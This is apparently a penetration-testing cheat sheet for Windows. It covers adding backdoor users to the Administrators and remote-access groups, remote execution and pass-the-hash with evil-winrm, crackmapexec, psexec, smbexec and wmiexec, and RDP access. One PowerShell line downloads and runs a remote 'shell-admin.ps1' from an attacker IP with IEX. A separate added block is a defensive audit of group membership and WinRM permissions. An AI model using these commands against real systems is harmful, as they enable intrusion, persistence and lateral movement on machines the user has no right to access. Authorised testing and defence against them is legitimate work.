
# General: Windows

:::tip Page format

The procedure is written in Russian. The methodology keeps the headings (common terms are partly localized), tables, illustrations and code blocks: commands and parameters are in English, with the syntax left untranslated.

:::

## Procedure

  1. Identify the OS and the constraints of the environment.
  2. Follow the relevant section for the typical techniques and commands.
  3. Record the output for the report.
  4. Code blocks are in English.

## Methodology

## User

### Creating a user

```powershell
net user <USERNAME> <PASSWORD> /add
```

### Add a user to a group

```powershell
net localgroup Administrators <USERNAME> /add
```

### Add a user to the RDP group

```powershell
# Note: "Remote Management Users" grants WinRM (PowerShell remoting) access;
# the built-in group for RDP logons is "Remote Desktop Users".
net localgroup "Remote Management Users" <USERNAME> /add
```

### PowerShell credentials and how to use them

```powershell
# Storing the credentials as variables
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process as that user
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
```

### Recursive grep (PowerShell)

```powershell
Get-ChildItem -Recurse [-Include *.config,*.txt,*.ini] [-Exclude *.dll,*.exe,*.jar] | Select-String "<STRING>" -List | Select-Object -ExpandProperty Path | Out-String
# Shorter version
dir -Recurse *.* | sls -Pattern "foobar" | select -Unique Path
```

## Remote Command Execution

### WinRM

```powershell
# Check who is allowed to use the default remoting endpoint (needs an elevated session)
(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disabled, you can enable it with the following command
Enable-PSRemoting -Force
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -ComputerName <IP> -Credential $cred
```

```bash
evil-winrm -u <USERNAME> {-p <PASSWORD> | -H <HASH>} -i <TARGET_IP>
crackmapexec winrm <IP> -d <DOMAIN_NAME> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'
```
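A PowerShell audit that records, as one object for the report, the state the commands in the User and WinRM sections change or query: local group membership and the permission string of the default WinRM endpoint. This is an added example, not code from the original page; it assumes an elevated PowerShell 5.1 or later session on the host and uses only built-in cmdlets (Get-LocalGroupMember, Get-PSSessionConfiguration).

```powershell
# Added example (not from the original cheat sheet): snapshot the remote-access
# settings touched above so the report (step 3) shows the before/after state.
# Assumes an elevated PowerShell 5.1+ session on the host being assessed.
function Get-RemoteAccessAudit {
    [CmdletBinding()]
    param(
        # Groups whose membership grants privileged or remote access.
        [string[]]$Groups = @('Administrators',
                              'Remote Management Users',
                              'Remote Desktop Users')
    )

    $winrm = Get-Service -Name WinRM -ErrorAction SilentlyContinue

    # Permission string of the default endpoint, the same value the
    # WinRM section queries; it requires elevation, so failures are recorded.
    $perm = $null
    try {
        $perm = (Get-PSSessionConfiguration -Name Microsoft.PowerShell `
                    -ErrorAction Stop).Permission
    } catch { $perm = "unavailable: $($_.Exception.Message)" }

    # Membership of each group: the same data 'net localgroup <GROUP>' prints.
    $members = foreach ($g in $Groups) {
        try {
            $m = Get-LocalGroupMember -Group $g -ErrorAction Stop
            [pscustomobject]@{
                Group   = $g
                Members = ($m | ForEach-Object { $_.Name }) -join ', '
            }
        } catch {
            [pscustomobject]@{ Group = $g; Members = "unavailable: $($_.Exception.Message)" }
        }
    }

    [pscustomobject]@{
        Computer     = $env:COMPUTERNAME
        Collected    = (Get-Date).ToString('s')
        WinRMStatus  = if ($winrm) { $winrm.Status.ToString() } else { 'not installed' }
        EndpointACL  = $perm
        GroupMembers = $members
    }
}

# Usage: show the snapshot and keep a JSON copy for the report.
$audit = Get-RemoteAccessAudit
$audit | Format-List
$audit | ConvertTo-Json -Depth 4 | Set-Content -Path "$env:TEMP\remote-access-audit.json"
```

Run it once before the user and group changes and once after, and diff the two JSON files for the report.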

### Remote Desktop (RDP)

```bash
rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +compression +toggle-fullscreen +clipboard /cert-ignore /dynamic-resolution /u:<USERNAME> /p:'<PASSWORD>' /v:<IP>
```

Listing terminal-services sessions with the Impacket tstool (command followed by its output):

```bash
impacket-tstool.py '<DOMAIN>/<USERNAME>:<PASSWORD>'@<IP> qwinsta
SESSIONNAME  USERNAME          ID  STATE         Desktop   ConnectTime          DisconnectTime
============ ================= === ============= ========= ==================== ====================
Services                       0   Disconnected            None                 None
Console                        1   Connected     Locked    2025/03/02 13:52:43  None
RDP-Tcp#0    .\Administrator   2   Active        Unlocked  2025/03/03 07:23:07  2025/03/03 07:23:07
```

### PSEXEC

```bash
psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```

### SmbExec

```bash
smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```

### Crackmapexec

```bash
# Execute PowerShell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable'
# Execute a command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami
```

### WMIexec

```bash
wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```